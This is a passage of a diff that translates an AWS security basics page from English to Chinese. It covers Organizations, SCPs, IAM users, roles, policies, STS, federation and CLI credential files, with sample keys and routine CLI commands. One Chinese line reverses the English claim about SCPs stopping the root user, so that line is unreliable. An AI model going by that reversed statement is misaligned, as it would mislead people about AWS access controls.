在组织中创建账户 +- 邀请其他现有账户加入组织 +- 从组织中移除账户 +- 管理邀请 +- 对组织内的实体(根、OU 或账户)应用政策 +- 启用与支持的 AWS 服务的集成,以在组织中的所有账户之间提供服务功能。 +- 可以使用用于创建此根账户/组织的电子邮件和密码以根用户身份登录。 - The management account has the **responsibilities of a payer account** and is responsible for paying all charges that are accrued by the member accounts. You can't change an organization's management account. - -- **Member accounts** make up all of the rest of the accounts in an organization. An account can be a member of only one organization at a time. You can attach a policy to an account to apply controls to only that one account. - - Member accounts **must use a valid email address** and can have a **name**, in general they wont be able to manage the billing (but they might be given access to it). +管理账户具有 **付款账户的责任**,并负责支付所有由成员账户产生的费用。您无法更改组织的管理账户。 +- **成员账户** 组成了组织中所有其他账户。一个账户一次只能是一个组织的成员。您可以将政策附加到一个账户,以仅对该账户应用控制。 +- 成员账户 **必须使用有效的电子邮件地址**,并可以有一个 **名称**,通常他们将无法管理账单(但可能会被授予访问权限)。 ``` aws organizations create-account --account-name testingaccount --email testingaccount@lalala1233fr.com ``` +### **组织单位** -### **Organization Units** - -Accounts can be grouped in **Organization Units (OU)**. This way, you can create **policies** for the Organization Unit that are going to be **applied to all the children accounts**. Note that an OU can have other OUs as children. - +账户可以被分组为 **组织单位 (OU)**。通过这种方式,您可以为组织单位创建 **策略**,这些策略将 **应用于所有子账户**。请注意,一个 OU 可以有其他 OU 作为子单位。 ```bash # You can get the root id from aws organizations list-roots aws organizations create-organizational-unit --parent-id r-lalala --name TestOU ``` - ### Service Control Policy (SCP) -A **service control policy (SCP)** is a policy that specifies the services and actions that users and roles can use in the accounts that the SCP affects. SCPs are **similar to IAM** permissions policies except that they **don't grant any permissions**. Instead, SCPs specify the **maximum permissions** for an organization, organizational unit (OU), or account. When you attach a SCP to your organization root or an OU, the **SCP limits permissions for entities in member accounts**. +一个 **服务控制策略 (SCP)** 是一种策略,指定用户和角色在受 SCP 影响的账户中可以使用的服务和操作。SCP **类似于 IAM** 权限策略,但它们 **不授予任何权限**。相反,SCP 指定了组织、组织单位 (OU) 或账户的 **最大权限**。当您将 SCP 附加到您的组织根或 OU 时,**SCP 限制成员账户中实体的权限**。 -This is the ONLY way that **even the root user can be stopped** from doing something. For example, it could be used to stop users from disabling CloudTrail or deleting backups.\ -The only way to bypass this is to compromise also the **master account** that configures the SCPs (master account cannot be blocked). +这是 **即使是根用户也无法被阻止** 执行某些操作的唯一方法。例如,它可以用于阻止用户禁用 CloudTrail 或删除备份。\ +绕过此限制的唯一方法是同时攻陷配置 SCP 的 **主账户**(主账户无法被阻止)。 > [!WARNING] -> Note that **SCPs only restrict the principals in the account**, so other accounts are not affected. This means having an SCP deny `s3:GetObject` will not stop people from **accessing a public S3 bucket** in your account. +> 请注意,**SCP 仅限制账户中的主体**,因此其他账户不受影响。这意味着拥有一个 SCP 拒绝 `s3:GetObject` 不会阻止人们 **访问您账户中的公共 S3 存储桶**。 -SCP examples: +SCP 示例: -- Deny the root account entirely -- Only allow specific regions -- Only allow white-listed services -- Deny GuardDuty, CloudTrail, and S3 Public Block Access from +- 完全拒绝根账户 +- 仅允许特定区域 +- 仅允许白名单服务 +- 拒绝禁用 GuardDuty、CloudTrail 和 S3 公共阻止访问 - being disabled +- 拒绝删除或修改安全/事件响应角色。 -- Deny security/incident response roles from being deleted or +- 拒绝删除备份。 +- 拒绝创建 IAM 用户和访问密钥 - modified. - -- Deny backups from being deleted. -- Deny creating IAM users and access keys - -Find **JSON examples** in [https://docs.aws.amazon.com/organizations/latest/userguide/orgs_manage_policies_scps_examples.html](https://docs.aws.amazon.com/organizations/latest/userguide/orgs_manage_policies_scps_examples.html) +在 [https://docs.aws.amazon.com/organizations/latest/userguide/orgs_manage_policies_scps_examples.html](https://docs.aws.amazon.com/organizations/latest/userguide/orgs_manage_policies_scps_examples.html) 中查找 **JSON 示例**。 ### ARN -**Amazon Resource Name** is the **unique name** every resource inside AWS has, its composed like this: - +**亚马逊资源名称** 是每个 AWS 内部资源的 **唯一名称**,其组成如下: ``` arn:partition:service:region:account-id:resource-type/resource-id arn:aws:elasticbeanstalk:us-west-1:123456789098:environment/App/Env ``` - -Note that there are 4 partitions in AWS but only 3 ways to call them: +注意,AWS中有4个分区,但只有3种调用方式: - AWS Standard: `aws` - AWS China: `aws-cn` - AWS US public Internet (GovCloud): `aws-us-gov` - AWS Secret (US Classified): `aws` -## IAM - Identity and Access Management +## IAM - 身份和访问管理 -IAM is the service that will allow you to manage **Authentication**, **Authorization** and **Access Control** inside your AWS account. +IAM是允许您管理**身份验证**、**授权**和**访问控制**的服务。 -- **Authentication** - Process of defining an identity and the verification of that identity. This process can be subdivided in: Identification and verification. -- **Authorization** - Determines what an identity can access within a system once it's been authenticated to it. -- **Access Control** - The method and process of how access is granted to a secure resource +- **身份验证** - 定义身份和验证该身份的过程。此过程可以细分为:识别和验证。 +- **授权** - 确定身份在系统中经过身份验证后可以访问的内容。 +- **访问控制** - 授予安全资源访问权限的方法和过程。 -IAM can be defined by its ability to manage, control and govern authentication, authorization and access control mechanisms of identities to your resources within your AWS account. +IAM可以通过其管理、控制和治理身份对您AWS账户内资源的身份验证、授权和访问控制机制的能力来定义。 -### [AWS account root user](https://docs.aws.amazon.com/IAM/latest/UserGuide/id_root-user.html) +### [AWS账户根用户](https://docs.aws.amazon.com/IAM/latest/UserGuide/id_root-user.html) -When you first create an Amazon Web Services (AWS) account, you begin with a single sign-in identity that has **complete access to all** AWS services and resources in the account. This is the AWS account _**root user**_ and is accessed by signing in with the **email address and password that you used to create the account**. +当您首次创建Amazon Web Services (AWS)账户时,您将拥有一个具有**完全访问所有**AWS服务和资源的单一登录身份。这是AWS账户的_**根用户**_,通过使用**您用于创建账户的电子邮件地址和密码**进行登录。 -Note that a new **admin user** will have **less permissions that the root user**. +请注意,新创建的**管理员用户**将具有**比根用户更少的权限**。 -From a security point of view, it's recommended to create other users and avoid using this one. +从安全的角度来看,建议创建其他用户并避免使用此用户。 -### [IAM users](https://docs.aws.amazon.com/IAM/latest/UserGuide/id_users.html) +### [IAM用户](https://docs.aws.amazon.com/IAM/latest/UserGuide/id_users.html) -An IAM _user_ is an entity that you create in AWS to **represent the person or application** that uses it to **interact with AWS**. A user in AWS consists of a name and credentials (password and up to two access keys). +IAM_用户_是您在AWS中创建的实体,用于**代表使用它与AWS交互的人员或应用程序**。AWS中的用户由名称和凭据(密码和最多两个访问密钥)组成。 -When you create an IAM user, you grant it **permissions** by making it a **member of a user group** that has appropriate permission policies attached (recommended), or by **directly attaching policies** to the user. +当您创建IAM用户时,您通过将其设置为具有适当权限策略的**用户组成员**(推荐)或**直接将策略附加**到用户来授予其**权限**。 -Users can have **MFA enabled to login** through the console. API tokens of MFA enabled users aren't protected by MFA. If you want to **restrict the access of a users API keys using MFA** you need to indicate in the policy that in order to perform certain actions MFA needs to be present (example [**here**](https://docs.aws.amazon.com/IAM/latest/UserGuide/id_credentials_mfa_configure-api-require.html)). +用户可以启用**MFA登录**控制台。启用MFA的用户的API令牌不受MFA保护。如果您想要**使用MFA限制用户的API密钥访问**,您需要在策略中指明为了执行某些操作需要MFA(示例[**在这里**](https://docs.aws.amazon.com/IAM/latest/UserGuide/id_credentials_mfa_configure-api-require.html))。 #### CLI -- **Access Key ID**: 20 random uppercase alphanumeric characters like AKHDNAPO86BSHKDIRYT -- **Secret access key ID**: 40 random upper and lowercase characters: S836fh/J73yHSb64Ag3Rkdi/jaD6sPl6/antFtU (It's not possible to retrieve lost secret access key IDs). +- **访问密钥ID**:20个随机的大写字母数字字符,如AKHDNAPO86BSHKDIRYT +- **秘密访问密钥ID**:40个随机的大小写字符:S836fh/J73yHSb64Ag3Rkdi/jaD6sPl6/antFtU(无法检索丢失的秘密访问密钥ID)。 -Whenever you need to **change the Access Key** this is the process you should follow:\ +每当您需要**更改访问密钥**时,您应遵循以下过程:\ &#xNAN;_Create a new access key -> Apply the new key to system/application -> mark original one as inactive -> Test and verify new access key is working -> Delete old access key_ -### MFA - Multi Factor Authentication +### MFA - 多因素身份验证 -It's used to **create an additional factor for authentication** in addition to your existing methods, such as password, therefore, creating a multi-factor level of authentication.\ -You can use a **free virtual application or a physical device**. You can use apps like google authentication for free to activate a MFA in AWS. +它用于**创建额外的身份验证因素**,以补充您现有的方法,例如密码,从而创建多因素身份验证级别。\ +您可以使用**免费的虚拟应用程序或物理设备**。您可以使用像Google身份验证器这样的应用程序免费激活AWS中的MFA。 -Policies with MFA conditions can be attached to the following: +带有MFA条件的策略可以附加到以下内容: -- An IAM user or group -- A resource such as an Amazon S3 bucket, Amazon SQS queue, or Amazon SNS topic -- The trust policy of an IAM role that can be assumed by a user - -If you want to **access via CLI** a resource that **checks for MFA** you need to call **`GetSessionToken`**. That will give you a token with info about MFA.\ -Note that **`AssumeRole` credentials don't contain this information**. +- IAM用户或组 +- 资源,例如Amazon S3桶、Amazon SQS队列或Amazon SNS主题 +- 可以被用户假设的IAM角色的信任策略 +如果您想要**通过CLI访问**一个**检查MFA**的资源,您需要调用**`GetSessionToken`**。这将为您提供一个包含MFA信息的令牌。\ +请注意,**`AssumeRole`凭据不包含此信息**。 ```bash aws sts get-session-token --serial-number --token-code ``` +如[**此处所述**](https://docs.aws.amazon.com/IAM/latest/UserGuide/id_credentials_mfa_configure-api-require.html),有很多不同的情况**无法使用MFA**。 -As [**stated here**](https://docs.aws.amazon.com/IAM/latest/UserGuide/id_credentials_mfa_configure-api-require.html), there are a lot of different cases where **MFA cannot be used**. +### [IAM用户组](https://docs.aws.amazon.com/IAM/latest/UserGuide/id_groups.html) -### [IAM user groups](https://docs.aws.amazon.com/IAM/latest/UserGuide/id_groups.html) +IAM [用户组](https://docs.aws.amazon.com/IAM/latest/UserGuide/id_groups.html) 是一种**一次性将策略附加到多个用户**的方法,这可以使管理这些用户的权限变得更容易。**角色和组不能成为组的一部分**。 -An IAM [user group](https://docs.aws.amazon.com/IAM/latest/UserGuide/id_groups.html) is a way to **attach policies to multiple users** at one time, which can make it easier to manage the permissions for those users. **Roles and groups cannot be part of a group**. +您可以将**基于身份的策略附加到用户组**,以便用户组中的所有**用户**都**接收该策略的权限**。您**不能**在**策略**(例如基于资源的策略)中将**用户组**标识为**`Principal`**,因为组与权限相关,而不是身份验证,主体是经过身份验证的IAM实体。 -You can attach an **identity-based policy to a user group** so that all of the **users** in the user group **receive the policy's permissions**. You **cannot** identify a **user group** as a **`Principal`** in a **policy** (such as a resource-based policy) because groups relate to permissions, not authentication, and principals are authenticated IAM entities. +以下是用户组的一些重要特征: -Here are some important characteristics of user groups: +- 一个用户**组**可以**包含多个用户**,而一个**用户**可以**属于多个组**。 +- **用户组不能嵌套**;它们只能包含用户,而不能包含其他用户组。 +- **没有默认的用户组会自动包含AWS账户中的所有用户**。如果您想要这样的用户组,您必须创建它并将每个新用户分配给它。 +- AWS账户中IAM资源的数量和大小是有限制的,例如组的数量,以及用户可以成为成员的组的数量。有关更多信息,请参见[IAM和AWS STS配额](https://docs.aws.amazon.com/IAM/latest/UserGuide/reference_iam-quotas.html)。 -- A user **group** can **contain many users**, and a **user** can **belong to multiple groups**. -- **User groups can't be nested**; they can contain only users, not other user groups. -- There is **no default user group that automatically includes all users in the AWS account**. If you want to have a user group like that, you must create it and assign each new user to it. -- The number and size of IAM resources in an AWS account, such as the number of groups, and the number of groups that a user can be a member of, are limited. For more information, see [IAM and AWS STS quotas](https://docs.aws.amazon.com/IAM/latest/UserGuide/reference_iam-quotas.html). +### [IAM角色](https://docs.aws.amazon.com/IAM/latest/UserGuide/id_roles.html) -### [IAM roles](https://docs.aws.amazon.com/IAM/latest/UserGuide/id_roles.html) +IAM **角色**与**用户**非常**相似**,因为它是一个**具有权限策略的身份,决定了它在AWS中可以做什么和不能做什么**。然而,角色**没有任何凭证**(密码或访问密钥)与之关联。角色不是唯一与一个人关联,而是旨在**被任何需要它的人(并且有足够权限)假设**。IAM用户可以假设一个角色以**临时**承担特定任务的不同权限。角色可以被[**联合用户**](https://docs.aws.amazon.com/IAM/latest/UserGuide/id_roles_providers.html)分配,该用户通过使用外部身份提供者而不是IAM进行登录。 -An IAM **role** is very **similar** to a **user**, in that it is an **identity with permission policies that determine what** it can and cannot do in AWS. However, a role **does not have any credentials** (password or access keys) associated with it. Instead of being uniquely associated with one person, a role is intended to be **assumable by anyone who needs it (and have enough perms)**. An **IAM user can assume a role to temporarily** take on different permissions for a specific task. A role can be **assigned to a** [**federated user**](https://docs.aws.amazon.com/IAM/latest/UserGuide/id_roles_providers.html) who signs in by using an external identity provider instead of IAM. +IAM角色由**两种类型的策略**组成:**信任策略**,不能为空,定义**谁可以假设**该角色,以及**权限策略**,不能为空,定义**它可以访问什么**。 -An IAM role consists of **two types of policies**: A **trust policy**, which cannot be empty, defining **who can assume** the role, and a **permissions policy**, which cannot be empty, defining **what it can access**. +#### AWS安全令牌服务(STS) -#### AWS Security Token Service (STS) +AWS安全令牌服务(STS)是一个网络服务,促进**临时、有限权限凭证的发放**。它专门针对: -AWS Security Token Service (STS) is a web service that facilitates the **issuance of temporary, limited-privilege credentials**. It is specifically tailored for: +### [IAM中的临时凭证](https://docs.aws.amazon.com/IAM/latest/UserGuide/id_credentials_temp.html) -### [Temporary credentials in IAM](https://docs.aws.amazon.com/IAM/latest/UserGuide/id_credentials_temp.html) +**临时凭证主要与IAM角色一起使用**,但也有其他用途。您可以请求具有比标准IAM用户更有限权限集的临时凭证。这**防止**您**意外执行不允许的任务**。临时凭证的一个好处是它们在设定的时间段后会自动过期。您可以控制凭证的有效期。 -**Temporary credentials are primarily used with IAM roles**, but there are also other uses. You can request temporary credentials that have a more restricted set of permissions than your standard IAM user. This **prevents** you from **accidentally performing tasks that are not permitted** by the more restricted credentials. A benefit of temporary credentials is that they expire automatically after a set period of time. You have control over the duration that the credentials are valid. +### 策略 -### Policies +#### 策略权限 -#### Policy Permissions +用于分配权限。有两种类型: -Are used to assign permissions. There are 2 types: - -- AWS managed policies (preconfigured by AWS) -- Customer Managed Policies: Configured by you. You can create policies based on AWS managed policies (modifying one of them and creating your own), using the policy generator (a GUI view that helps you granting and denying permissions) or writing your own.. - -By **default access** is **denied**, access will be granted if an explicit role has been specified.\ -If **single "Deny" exist, it will override the "Allow"**, except for requests that use the AWS account's root security credentials (which are allowed by default). +- AWS管理策略(由AWS预配置) +- 客户管理策略:由您配置。您可以基于AWS管理策略创建策略(修改其中一个并创建自己的),使用策略生成器(一个帮助您授予和拒绝权限的GUI视图)或编写自己的策略。 +默认情况下,访问**被拒绝**,如果指定了明确的角色,则将授予访问权限。\ +如果**存在单个“拒绝”**,它将覆盖“允许”,但AWS账户的根安全凭证的请求(默认允许)除外。 ```javascript { - "Version": "2012-10-17", //Version of the policy - "Statement": [ //Main element, there can be more than 1 entry in this array - { - "Sid": "Stmt32894y234276923" //Unique identifier (optional) - "Effect": "Allow", //Allow or deny - "Action": [ //Actions that will be allowed or denied - "ec2:AttachVolume", - "ec2:DetachVolume" - ], - "Resource": [ //Resource the action and effect will be applied to - "arn:aws:ec2:*:*:volume/*", - "arn:aws:ec2:*:*:instance/*" - ], - "Condition": { //Optional element that allow to control when the permission will be effective - "ArnEquals": {"ec2:SourceInstanceARN": "arn:aws:ec2:*:*:instance/instance-id"} - } - } - ] +"Version": "2012-10-17", //Version of the policy +"Statement": [ //Main element, there can be more than 1 entry in this array +{ +"Sid": "Stmt32894y234276923" //Unique identifier (optional) +"Effect": "Allow", //Allow or deny +"Action": [ //Actions that will be allowed or denied +"ec2:AttachVolume", +"ec2:DetachVolume" +], +"Resource": [ //Resource the action and effect will be applied to +"arn:aws:ec2:*:*:volume/*", +"arn:aws:ec2:*:*:instance/*" +], +"Condition": { //Optional element that allow to control when the permission will be effective +"ArnEquals": {"ec2:SourceInstanceARN": "arn:aws:ec2:*:*:instance/instance-id"} +} +} +] } ``` +The [全球字段可以在任何服务中用于条件的文档在这里](https://docs.aws.amazon.com/IAM/latest/UserGuide/reference_policies_condition-keys.html#condition-keys-resourceaccount).\ +The [每个服务中可以用于条件的特定字段的文档在这里](https://docs.aws.amazon.com/service-authorization/latest/reference/reference_policies_actions-resources-contextkeys.html). -The [global fields that can be used for conditions in any service are documented here](https://docs.aws.amazon.com/IAM/latest/UserGuide/reference_policies_condition-keys.html#condition-keys-resourceaccount).\ -The [specific fields that can be used for conditions per service are documented here](https://docs.aws.amazon.com/service-authorization/latest/reference/reference_policies_actions-resources-contextkeys.html). +#### 内联策略 -#### Inline Policies +这种策略是**直接分配**给用户、组或角色的。因此,它们不会出现在策略列表中,因为其他任何人都可以使用它们。\ +内联策略在您想要**保持策略与应用于的身份之间的严格一对一关系**时非常有用。例如,您想确保策略中的权限不会意外分配给除其预期身份以外的身份。当您使用内联策略时,策略中的权限不能意外附加到错误的身份。此外,当您使用AWS管理控制台删除该身份时,嵌入在身份中的策略也会被删除。这是因为它们是主体实体的一部分。 -This kind of policies are **directly assigned** to a user, group or role. Then, they do not appear in the Policies list as any other one can use them.\ -Inline policies are useful if you want to **maintain a strict one-to-one relationship between a policy and the identity** that it's applied to. For example, you want to be sure that the permissions in a policy are not inadvertently assigned to an identity other than the one they're intended for. When you use an inline policy, the permissions in the policy cannot be inadvertently attached to the wrong identity. In addition, when you use the AWS Management Console to delete that identity, the policies embedded in the identity are deleted as well. That's because they are part of the principal entity. +#### 资源桶策略 -#### Resource Bucket Policies +这些是可以在**资源**中定义的**策略**。**并非所有AWS资源都支持它们**。 -These are **policies** that can be defined in **resources**. **Not all resources of AWS supports them**. +如果主体没有对它们的明确拒绝,并且资源策略授予他们访问权限,则他们被允许。 -If a principal does not have an explicit deny on them, and a resource policy grants them access, then they are allowed. +### IAM边界 -### IAM Boundaries +IAM边界可以用于**限制用户或角色应有的权限**。这样,即使通过**不同的策略**授予用户不同的权限,如果他尝试使用它们,操作将**失败**。 -IAM boundaries can be used to **limit the permissions a user or role should have access to**. This way, even if a different set of permissions are granted to the user by a **different policy** the operation will **fail** if he tries to use them. +边界只是附加到用户的策略,**指示用户或角色可以拥有的最大权限级别**。因此,**即使用户具有管理员访问权限**,如果边界指示他只能读取S·桶,那就是他能做的最大事情。 -A boundary is just a policy attached to a user which **indicates the maximum level of permissions the user or role can have**. So, **even if the user has Administrator access**, if the boundary indicates he can only read S· buckets, that's the maximum he can do. +**这**、**SCPs**和**遵循最小权限**原则是控制用户没有超过其所需权限的方法。 -**This**, **SCPs** and **following the least privilege** principle are the ways to control that users doesn't have more permissions than the ones he needs. +### 会话策略 -### Session Policies - -A session policy is a **policy set when a role is assumed** somehow. This will be like an **IAM boundary for that session**: This means that the session policy doesn't grant permissions but **restrict them to the ones indicated in the policy** (being the max permissions the ones the role has). - -This is useful for **security meassures**: When an admin is going to assume a very privileged role he could restrict the permission to only the ones indicated in the session policy in case the session gets compromised. +会话策略是**在某种情况下假定角色时设置的策略**。这将像是该会话的**IAM边界**:这意味着会话策略不授予权限,而是**将权限限制为策略中指示的权限**(最大权限是角色拥有的权限)。 +这对于**安全措施**非常有用:当管理员要假定一个非常特权的角色时,他可以将权限限制为仅在会话策略中指示的权限,以防会话被破坏。 ```bash aws sts assume-role \ - --role-arn \ - --role-session-name \ - [--policy-arns ] - [--policy ] +--role-arn \ +--role-session-name \ +[--policy-arns ] +[--policy ] ``` +注意,默认情况下,**AWS 可能会向即将生成的会话添加会话策略**,这是由于第三方原因。例如,在[未经身份验证的 Cognito 假定角色](../aws-services/aws-cognito-enum/cognito-identity-pools.md#accessing-iam-roles)中,默认情况下(使用增强身份验证),AWS 将生成**带有会话策略的会话凭证**,该策略限制会话可以访问的服务[**为以下列表**](https://docs.aws.amazon.com/cognito/latest/developerguide/iam-roles.html#access-policies-scope-down-services)。 -Note that by default **AWS might add session policies to sessions** that are going to be generated because of third reasons. For example, in [unauthenticated cognito assumed roles](../aws-services/aws-cognito-enum/cognito-identity-pools.md#accessing-iam-roles) by default (using enhanced authentication), AWS will generate **session credentials with a session policy** that limits the services that session can access [**to the following list**](https://docs.aws.amazon.com/cognito/latest/developerguide/iam-roles.html#access-policies-scope-down-services). +因此,如果在某个时刻你遇到错误“...因为没有会话策略允许...”,而角色有权限执行该操作,那是因为**有一个会话策略阻止了它**。 -Therefore, if at some point you face the error "... because no session policy allows the ...", and the role has access to perform the action, it's because **there is a session policy preventing it**. +### 身份联合 -### Identity Federation +身份联合**允许来自外部身份提供者的用户**安全地访问 AWS 资源,而无需提供有效 IAM 用户帐户的 AWS 用户凭证。\ +身份提供者的一个例子可以是你自己的企业**Microsoft Active Directory**(通过**SAML**)或**OpenID**服务(如**Google**)。联合访问将允许其中的用户访问 AWS。 -Identity federation **allows users from identity providers which are external** to AWS to access AWS resources securely without having to supply AWS user credentials from a valid IAM user account.\ -An example of an identity provider can be your own corporate **Microsoft Active Directory** (via **SAML**) or **OpenID** services (like **Google**). Federated access will then allow the users within it to access AWS. +要配置此信任,生成一个**IAM 身份提供者(SAML 或 OAuth)**,该提供者将**信任****其他平台**。然后,至少一个**IAM 角色被分配(信任)给身份提供者**。如果来自受信任平台的用户访问 AWS,他将以提到的角色进行访问。 -To configure this trust, an **IAM Identity Provider is generated (SAML or OAuth)** that will **trust** the **other platform**. Then, at least one **IAM role is assigned (trusting) to the Identity Provider**. If a user from the trusted platform access AWS, he will be accessing as the mentioned role. - -However, you will usually want to give a **different role depending on the group of the user** in the third party platform. Then, several **IAM roles can trust** the third party Identity Provider and the third party platform will be the one allowing users to assume one role or the other. +然而,通常你会希望根据第三方平台中用户的**组别给予不同的角色**。然后,多个**IAM 角色可以信任**第三方身份提供者,第三方平台将允许用户假定一个角色或另一个角色。
-### IAM Identity Center +### IAM 身份中心 -AWS IAM Identity Center (successor to AWS Single Sign-On) expands the capabilities of AWS Identity and Access Management (IAM) to provide a **central plac**e that brings together **administration of users and their access to AWS** accounts and cloud applications. +AWS IAM 身份中心(AWS 单点登录的继任者)扩展了 AWS 身份和访问管理(IAM)的功能,提供一个**集中位置**,将**用户及其对 AWS**帐户和云应用程序的访问管理汇集在一起。 -The login domain is going to be something like `.awsapps.com`. +登录域将类似于`.awsapps.com`。 -To login users, there are 3 identity sources that can be used: +要登录用户,可以使用 3 个身份源: -- Identity Center Directory: Regular AWS users -- Active Directory: Supports different connectors -- External Identity Provider: All users and groups come from an external Identity Provider (IdP) +- 身份中心目录:常规 AWS 用户 +- Active Directory:支持不同的连接器 +- 外部身份提供者:所有用户和组来自外部身份提供者(IdP)
-In the simplest case of Identity Center directory, the **Identity Center will have a list of users & groups** and will be able to **assign policies** to them to **any of the accounts** of the organization. +在身份中心目录的最简单情况下,**身份中心将拥有用户和组的列表**,并能够**为他们分配策略**到**组织的任何帐户**。 -In order to give access to a Identity Center user/group to an account a **SAML Identity Provider trusting the Identity Center will be created**, and a **role trusting the Identity Provider with the indicated policies will be created** in the destination account. +为了给予身份中心用户/组对帐户的访问,将创建一个**信任身份中心的 SAML 身份提供者**,并在目标帐户中创建一个**信任身份提供者并具有指示策略的角色**。 #### AwsSSOInlinePolicy -It's possible to **give permissions via inline policies to roles created via IAM Identity Center**. The roles created in the accounts being given **inline policies in AWS Identity Center** will have these permissions in an inline policy called **`AwsSSOInlinePolicy`**. +可以通过内联策略**向通过 IAM 身份中心创建的角色授予权限**。在被授予**AWS 身份中心内联策略**的帐户中创建的角色将具有名为**`AwsSSOInlinePolicy`**的内联策略中的这些权限。 -Therefore, even if you see 2 roles with an inline policy called **`AwsSSOInlinePolicy`**, it **doesn't mean it has the same permissions**. +因此,即使你看到两个具有名为**`AwsSSOInlinePolicy`**的内联策略的角色,也**并不意味着它们具有相同的权限**。 -### Cross Account Trusts and Roles +### 跨账户信任和角色 -**A user** (trusting) can create a Cross Account Role with some policies and then, **allow another user** (trusted) to **access his account** but only **having the access indicated in the new role policies**. To create this, just create a new Role and select Cross Account Role. Roles for Cross-Account Access offers two options. Providing access between AWS accounts that you own, and providing access between an account that you own and a third party AWS account.\ -It's recommended to **specify the user who is trusted and not put some generic thing** because if not, other authenticated users like federated users will be able to also abuse this trust. +**用户**(信任)可以创建一个带有某些策略的跨账户角色,然后**允许另一个用户**(受信任)**访问他的帐户**,但仅**具有新角色策略中指示的访问权限**。要创建此角色,只需创建一个新角色并选择跨账户角色。跨账户访问的角色提供两个选项。提供你拥有的 AWS 账户之间的访问,以及提供你拥有的账户与第三方 AWS 账户之间的访问。\ +建议**指定被信任的用户,而不是放置一些通用内容**,因为如果不这样做,其他经过身份验证的用户(如联合用户)也将能够滥用此信任。 -### AWS Simple AD +### AWS 简单 AD -Not supported: +不支持: -- Trust Relations -- AD Admin Center -- Full PS API support -- AD Recycle Bin -- Group Managed Service Accounts -- Schema Extensions -- No Direct access to OS or Instances +- 信任关系 +- AD 管理中心 +- 完整的 PS API 支持 +- AD 回收站 +- 组托管服务账户 +- 架构扩展 +- 无法直接访问操作系统或实例 -#### Web Federation or OpenID Authentication +#### Web 联合或 OpenID 身份验证 -The app uses the AssumeRoleWithWebIdentity to create temporary credentials. However, this doesn't grant access to the AWS console, just access to resources within AWS. +该应用程序使用 AssumeRoleWithWebIdentity 创建临时凭证。然而,这并不授予对 AWS 控制台的访问,仅授予对 AWS 内部资源的访问。 -### Other IAM options +### 其他 IAM 选项 -- You can **set a password policy setting** options like minimum length and password requirements. -- You can **download "Credential Report"** with information about current credentials (like user creation time, is password enabled...). You can generate a credential report as often as once every **four hours**. +- 你可以**设置密码策略设置**选项,如最小长度和密码要求。 +- 你可以**下载“凭证报告”**,其中包含有关当前凭证的信息(如用户创建时间、密码是否启用...)。你可以每**四小时**生成一次凭证报告。 -AWS Identity and Access Management (IAM) provides **fine-grained access control** across all of AWS. With IAM, you can specify **who can access which services and resources**, and under which conditions. With IAM policies, you manage permissions to your workforce and systems to **ensure least-privilege permissions**. +AWS 身份和访问管理(IAM)提供**细粒度的访问控制**,覆盖所有 AWS。使用 IAM,你可以指定**谁可以访问哪些服务和资源**,以及在什么条件下。通过 IAM 策略,你管理对你的员工和系统的权限,以**确保最小权限**。 -### IAM ID Prefixes +### IAM ID 前缀 -In [**this page**](https://docs.aws.amazon.com/IAM/latest/UserGuide/reference_identifiers.html#identifiers-unique-ids) you can find the **IAM ID prefixe**d of keys depending on their nature: +在[**此页面**](https://docs.aws.amazon.com/IAM/latest/UserGuide/reference_identifiers.html#identifiers-unique-ids)中,你可以找到根据其性质的键的**IAM ID 前缀**: -| ABIA | [AWS STS service bearer token](https://docs.aws.amazon.com/IAM/latest/UserGuide/id_credentials_bearer.html) | +| ABIA | [AWS STS 服务承载令牌](https://docs.aws.amazon.com/IAM/latest/UserGuide/id_credentials_bearer.html) | | ---- | -------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- | -| ACCA | Context-specific credential | -| AGPA | User group | -| AIDA | IAM user | -| AIPA | Amazon EC2 instance profile | -| AKIA | Access key | -| ANPA | Managed policy | -| ANVA | Version in a managed policy | -| APKA | Public key | -| AROA | Role | -| ASCA | Certificate | -| ASIA | [Temporary (AWS STS) access key IDs](https://docs.aws.amazon.com/STS/latest/APIReference/API_Credentials.html) use this prefix, but are unique only in combination with the secret access key and the session token. | +| ACCA | 上下文特定凭证 | +| AGPA | 用户组 | +| AIDA | IAM 用户 | +| AIPA | Amazon EC2 实例配置文件 | +| AKIA | 访问密钥 | +| ANPA | 管理策略 | +| ANVA | 管理策略中的版本 | +| APKA | 公钥 | +| AROA | 角色 | +| ASCA | 证书 | +| ASIA | [临时(AWS STS)访问密钥 ID](https://docs.aws.amazon.com/STS/latest/APIReference/API_Credentials.html) 使用此前缀,但仅在与秘密访问密钥和会话令牌组合时是唯一的。 | -### Recommended permissions to audit accounts +### 审计账户的推荐权限 -The following privileges grant various read access of metadata: +以下权限授予各种元数据的读取访问: - `arn:aws:iam::aws:policy/SecurityAudit` - `arn:aws:iam::aws:policy/job-function/ViewOnlyAccess` @@ -336,14 +320,13 @@ The following privileges grant various read access of metadata: - `directconnect:DescribeConnections` - `dynamodb:ListTables` -## Misc +## 杂项 -### CLI Authentication - -In order for a regular user authenticate to AWS via CLI you need to have **local credentials**. By default you can configure them **manually** in `~/.aws/credentials` or by **running** `aws configure`.\ -In that file you can have more than one profile, if **no profile** is specified using the **aws cli**, the one called **`[default]`** in that file will be used.\ -Example of credentials file with more than 1 profile: +### CLI 身份验证 +为了让常规用户通过 CLI 认证到 AWS,你需要拥有**本地凭证**。默认情况下,你可以在`~/.aws/credentials`中**手动**配置它们,或通过**运行**`aws configure`。\ +在该文件中,你可以拥有多个配置文件,如果在使用**aws cli**时**未指定配置文件**,则将使用该文件中名为**`[default]`**的配置文件。\ +具有多个配置文件的凭证文件示例: ``` [default] aws_access_key_id = AKIA5ZDCUJHF83HDTYUT @@ -354,12 +337,10 @@ aws_access_key_id = AKIA8YDCu7TGTR356SHYT aws_secret_access_key = uOcdhof683fbOUGFYEQuR2EIHG34UY987g6ff7 region = eu-west-2 ``` +如果您需要访问**不同的AWS账户**,并且您的配置文件被授予访问**在这些账户内假设角色**的权限,您不需要每次手动调用STS(`aws sts assume-role --role-arn --role-session-name sessname`)并配置凭证。 -If you need to access **different AWS accounts** and your profile was given access to **assume a role inside those accounts**, you don't need to call manually STS every time (`aws sts assume-role --role-arn --role-session-name sessname`) and configure the credentials. - -You can use the `~/.aws/config` file to[ **indicate which roles to assume**](https://docs.aws.amazon.com/cli/latest/userguide/cli-configure-role.html), and then use the `--profile` param as usual (the `assume-role` will be performed in a transparent way for the user).\ -A config file example: - +您可以使用`~/.aws/config`文件来[**指示要假设的角色**](https://docs.aws.amazon.com/cli/latest/userguide/cli-configure-role.html),然后像往常一样使用`--profile`参数(`assume-role`将以透明的方式为用户执行)。\ +配置文件示例: ``` 